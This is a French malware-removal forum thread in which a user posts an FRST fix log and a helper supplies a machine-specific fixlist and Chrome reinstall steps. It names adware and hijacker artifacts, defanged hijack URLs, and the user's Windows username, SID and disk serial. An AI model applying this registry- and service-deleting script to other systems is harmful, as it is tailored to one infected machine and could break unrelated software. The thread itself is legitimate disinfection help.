C:\Users\Melkus\AppData\Local\Kitty
C:\Program Files (x86)\4mzczf76zp
C:\Users\Melkus\AppData\Local\SNARE
C:\Users\Melkus\AppData\Local\SNAREA
C:\Users\Melkus\AppData\Roaming\WinSAPSvc
C:\Program Files (x86)\Elex-tech
C:\Program Files (x86)\Clonerge Community
C:\Users\Melkus\AppData\Roaming\Fafeda
C:\Users\Melkus\AppData\Roaming\Lomaba
C:\Users\Melkus\AppData\Roaming\Interstatnogui
C:\Program Files (x86)\Alltie
C:\ProgramData\{3D62F801-B720-72C7-31E6-EC85ABA4674B}
C:\Program Files (x86)\MIO
Hosts:
RemoveProxy:
EmptyTemp:

*****************

HKU\S-1-5-21-2231331243-3827533549-682609126-1002_Classes\ChromeHTML => clé non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0D15C65D-65E3-49F7-8835-16096E942ABE} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0D15C65D-65E3-49F7-8835-16096E942ABE} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Clonerge Community => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Clonerge Community => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{191A3896-DDC9-401B-B402-04F407776F91} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{191A3896-DDC9-401B-B402-04F407776F91} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\AutoPico Daily Restart => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoPico Daily Restart => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3E3D9762-225D-4899-8A1F-F94FF825DBBD} => clé non trouvé(e).
C:\WINDOWS\System32\Tasks\Windows-PG => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-PG => clé non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4F9589EC-AA06-4358-9664-AB447F1F2C87} => clé non trouvé(e).
C:\WINDOWS\System32\Tasks\Milimili => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => clé non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6B97B6A2-9538-4164-B71A-06FE91D0ABE6} => clé non trouvé(e).
C:\WINDOWS\System32\Tasks\Yahoo! Powered tared => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Yahoo! Powered tared => clé non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{742E1317-BA59-41F6-92C0-E5C112B6930C} => clé non trouvé(e).
C:\WINDOWS\System32\Tasks\Grewgh => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Grewgh => clé non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7CE71D51-2EC0-4692-881E-E70077F5BBB8} => clé non trouvé(e).
C:\WINDOWS\System32\Tasks\rPkPf9RkNM => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\rPkPf9RkNM => clé non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7D47881D-182C-4A15-BBB1-076EA1BA353C} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7D47881D-182C-4A15-BBB1-076EA1BA353C} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\{16FEDEAC-6E5E-9382-67C8-52C477717602} => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{16FEDEAC-6E5E-9382-67C8-52C477717602} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{99827DB0-90FE-411B-BB94-3C9BE029A179} => clé non trouvé(e).
C:\WINDOWS\System32\Tasks\Samsung Update => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Samsung Update => clé non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F0B5621B-B905-4AE3-B078-02972E781D46} => clé non trouvé(e).
C:\WINDOWS\System32\Tasks\Bing Search Engine tared => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Bing Search Engine tared => clé non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F4A0A86F-2438-48B9-BF25-16BC8DB74F24} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F4A0A86F-2438-48B9-BF25-16BC8DB74F24} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WPD\SqmUpload_S-1-5-21-2231331243-3827533549-682609126-1002 => clé supprimé(es) avec succès
C:\WINDOWS\Tasks\Bing Search Engine tared.job => non trouvé(e).
C:\WINDOWS\Tasks\Yahoo! Powered tared.job => non trouvé(e).
C:\WINDOWS\Tasks\{16FEDEAC-6E5E-9382-67C8-52C477717602}.job => déplacé(es) avec succès
C:\WINDOWS\Tasks\{1C53A59E-A7FF-BB95-534E-0C55B57C0651}.job => déplacé(es) avec succès
C:\Users\Melkus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => déplacé(es) avec succès
C:\Users\Melkus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => non trouvé(e).
C:\Users\Melkus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => déplacé(es) avec succès
C:\Users\Public\Desktop\Google Chrome.lnk => non trouvé(e).
C:\Users\Melkus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\Melkus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Raccourci argument supprimé(es) avec succès.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\iTunesHelper => valeur supprimé(es) avec succès
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\WSHelperSetup.exe => valeur supprimé(es) avec succès
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\Roculugona => valeur supprimé(es) avec succès
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\Dobahafodo => valeur supprimé(es) avec succès
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\Software\Microsoft\Windows\CurrentVersion\Run\\Interstatnogui => valeur non trouvé(e).
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_F6D48095A694DE35312CD25CBE45C65F => valeur supprimé(es) avec succès
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_99602D254C211209F9326B181941B3F0 => valeur non trouvé(e).
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\sw210cvn => clé supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order sw210cvn => supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{DE61C5D0-1E9D-11E7-83B9-64006A5CFC23} => valeur supprimé(es) avec succès
HKCR\CLSID\{DE61C5D0-1E9D-11E7-83B9-64006A5CFC23} => clé non trouvé(e).
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\AutoConfigURL => valeur supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies\\ => valeur supprimé(es) avec succès
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => valeur restauré(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => valeur restauré(es) avec succès
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => valeur restauré(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => valeur restauré(es) avec succès
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => valeur restauré(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => valeur restauré(es) avec succès
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => valeur restauré(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => valeur restauré(es) avec succès
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\Software\Microsoft\Internet Explorer\Main\\Start Page => valeur restauré(es) avec succès
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => valeur restauré(es) avec succès
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valeur restauré(es) avec succès
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé non trouvé(e).
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé non trouvé(e).
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valeur restauré(es) avec succès
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé non trouvé(e).
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé non trouvé(e).
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{A13C2648-91D4-4BF3-BC6D-0079707C4389} => valeur supprimé(es) avec succès
HKCR\CLSID\{A13C2648-91D4-4BF3-BC6D-0079707C4389} => clé non trouvé(e).
Firefox "newtab" supprimé(es) avec succès
Firefox DefaultSearchEngine supprimé(es) avec succès
Firefox SelectedSearchEngine supprimé(es) avec succès
Firefox "homepage" supprimé(es) avec succès
FF NewTab: Firefox\Firefox\Profiles\ac2wd67b.default -> hxxp://www.initialpage123.com/?z=cabb2b215240f ... 32&type=hp => non trouvé(e)
FF DefaultSearchEngine: Firefox\Firefox\Profiles\ac2wd67b.default -> initialpage123 => non trouvé(e)
FF SelectedSearchEngine: Firefox\Firefox\Profiles\ac2wd67b.default -> initialpage123 => non trouvé(e)
C:\Users\Melkus\AppData\Local\Google\Chrome\User Data\Default\Extensions\ppkecenfjeboginhnagdgbhnkgckeiod => déplacé(es) avec succès
HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command\\Default => valeur restauré(es) avec succès
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => clé non trouvé(e).
FirefoxU => service non trouvé(e).
Kitty => service non trouvé(e).
OtherSearch => service non trouvé(e).
SNARE => service non trouvé(e).
SNAREA => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\SNAREA => clé supprimé(es) avec succès
SNAREA => service supprimé(es) avec succès
WinSAPSvc => service non trouvé(e).
iSafeKrnlMon => service non trouvé(e).
"C:\Program Files (x86)\Everness" => non trouvé(e).
"C:\Program Files (x86)\Firefox" => non trouvé(e).
"C:\Users\Melkus\AppData\Local\Kitty" => non trouvé(e).
C:\Program Files (x86)\4mzczf76zp => déplacé(es) avec succès
C:\Users\Melkus\AppData\Local\SNARE => déplacé(es) avec succès
C:\Users\Melkus\AppData\Local\SNAREA => déplacé(es) avec succès
"C:\Users\Melkus\AppData\Roaming\WinSAPSvc" => non trouvé(e).
"C:\Program Files (x86)\Elex-tech" => non trouvé(e).
C:\Program Files (x86)\Clonerge Community => déplacé(es) avec succès
C:\Users\Melkus\AppData\Roaming\Fafeda => déplacé(es) avec succès
C:\Users\Melkus\AppData\Roaming\Lomaba => déplacé(es) avec succès
"C:\Users\Melkus\AppData\Roaming\Interstatnogui" => non trouvé(e).
"C:\Program Files (x86)\Alltie" => non trouvé(e).
C:\ProgramData\{3D62F801-B720-72C7-31E6-EC85ABA4674B} => déplacé(es) avec succès
C:\Program Files (x86)\MIO => déplacé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2231331243-3827533549-682609126-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès


========= Fin de RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 421495 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 247989467 B
Java, Flash, Steam htmlcache => 523 B
Windows/system/drivers => 18909795 B
Edge => 1355 B
Chrome => 45136263 B
Firefox => 10741526 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 15148701 B
LocalService => 0 B
NetworkService => 362694 B
Melkus => 360680180 B

RecycleBin => 0 B
EmptyTemp: => 667 MB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 12:39:55 ====

Et voici les rapports frst.txt et addition.txt

FRST : http://pjjoint.malekal.com/files.php?id ... u8y15n14w5

ADDITION : http://pjjoint.malekal.com/files.php?id ... 15q11f12u7

Je vous remercie de votre aide, Chrome re-fonctionne parfaitement, cependant je peux pas accéder à la commande (chrome://plugins), il me met un message d'erreur "Ce site est inaccessible".

Bien cordialement,

Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 27153
Inscription : 28 févr. 2008 14:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Re: Infection Navigateur WEB

Message par angelique » 06 mai 2017 16:32

  • Ouvre le bloc-notes : Menu Démarrer / Tous les programmes / Accessoires et Bloc-Notes. (ou executer➫notepad)
    Copie/colle dedans ce qui suit :

    Code : Tout sélectionner

    Task: {BDCC17D3-D9A9-4D79-8B5E-627A29099027} - System32\Tasks\{1C53A59E-A7FF-BB95-534E-0C55B57C0651} => C:\Users\Melkus\AppData\Roaming\hodor\PRODUC~1.EXE [2013-04-26] ()
    Edge HomeButtonPage: HKU\S-1-5-21-2231331243-3827533549-682609126-1002 -> hxxp://www.ourluckysites.com/?type=hp&ts=1493296358&z=c995136131f360786bcd401g6z0tdc5odt2qbcbwfb&from=che0812&uid=ST1000LM024XHN-M101MBB_S32XJ9BF403432
    CHR DefaultSearchURL: Default -> hxxp://srch.bar/{searchTerms}
    CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms}
    CHR Extension: (vidIQ Vision for YouTube) - C:\Users\Melkus\AppData\Local\Google\Chrome\User Data\Default\Extensions\pachckjkecffpdphbpmfolblodfkgbhl [2017-05-04]
    2017-05-04 10:22 - 2017-05-04 11:33 - 00000000 ____D C:\AdwCleaner
    2017-04-28 22:04 - 2017-05-04 09:38 - 00000000 ____D C:\Alitkojck
    2017-04-25 21:57 - 2017-04-25 21:57 - 00000000 ____D C:\WINDOWS\psgo
    2017-04-27 16:27 - 2017-05-02 23:04 - 00000000 _____ C:\WINDOWS\SysWOW64\1
    2017-04-27 14:16 - 2017-04-27 14:16 - 00000000 _____ C:\WINDOWS\SysWOW64\33
    2017-04-21 11:54 - 2017-04-21 11:54 - 00000000 _____ C:\WINDOWS\SysWOW64\22
    2017-04-20 12:13 - 2017-04-27 14:16 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    2017-04-20 12:13 - 2017-04-20 12:14 - 00000000 _____ C:\WINDOWS\SysWOW64\44
    2017-04-17 21:49 - 2017-05-04 11:32 - 00000000 ____D C:\WINDOWS\Update
    2017-04-17 21:40 - 2017-05-02 19:50 - 00000000 ____D C:\Program Files (x86)\sw210cvn
    2017-04-14 14:33 - 2017-04-14 14:33 - 00000007 _____ C:\WINDOWS\SysWOW64\C533.tmp
    2017-04-14 14:32 - 2017-04-14 14:32 - 00000000 ____D C:\ProgramData\Software
    2017-04-13 14:02 - 2017-05-04 11:32 - 00000000 ____D C:\Update
    2017-04-13 13:56 - 2017-04-14 14:29 - 00000000 ____D C:\Program Files (x86)\MK
    2017-04-13 12:57 - 2017-04-13 12:57 - 00000000 ____D C:\Users\Melkus\AppData\Local\CrashRpt
    2017-04-13 12:55 - 2017-05-04 09:38 - 00000000 ____D C:\Program Files (x86)\Drization
    2017-04-13 12:55 - 2017-04-13 15:43 - 00000000 ____D C:\Users\Melkus\AppData\Roaming\Atrakitasy
    2017-04-13 12:55 - 2017-04-13 12:59 - 00000000 ____D C:\Users\Melkus\AppData\Local\Kernoentatnetion
    Hosts:
    EmptyTemp:
    
    
  • Menu Fichier / Enregistrer-sous
    Place toi sur le bureau.
    Dans le champs en bas, nom du fichier mets : fixlist.txt
    Clic sur Enregistrer - cela va créer un fichier fixlist.txt sur le bureau.
  • Ferme toutes les applications, y compris ton navigateur
  • Double-clique sur FRST.exe
    Image Sous Vista, Windows 7, 8,10, etc.... il faut lancer le fichier par clic-droit ➫ Exécuter en tant qu'administrateur
    Sur le menu principal, clique une seule fois sur Corriger/Fix et patiente le temps de la correction


    Un redémarrage peut être nécessaire (pas obligatoire).
  • L'outil va créer un rapport de correction Fixlog.txt. Poste ce rapport dans ta réponse


    Exporte tes favoris : https://support.google.com/chrome/answer/96816?hl=fr
    Désinstalle Google Chrome depuis le panneau de configuration et programmes et fonctionnalités (ou désinstaller programmes).
    A la désinstallation coche l'option de suppression des profils.
    Télécharge et Réinstalle Google Chrome http://telecharger.malekal.com/download/google-chrome/
    Au premier démarrage de Google Chrome, tu dois le trouver vierge, comme lors de la première installation, pas de page de démarrage habituelle, ni les extensions qui étaient présentes.
    Tout doit avoir disparu.
    réimporte les favoris.



    ............avec ton commentaire si c'est mieux !
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!
Image
---------------------------------------------------------------------------------------------------------------------
ZIK.:: R00tsL3gacy Reggae141.com
ZIK.:: LaGr0sseRadi0

Répondre

Revenir vers « VIRUS : Supprimer/Desinfecter (Trojan, Adwares, Ransomwares, Backdoor, Spywares) »

Qui est en ligne ?

Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 20 invités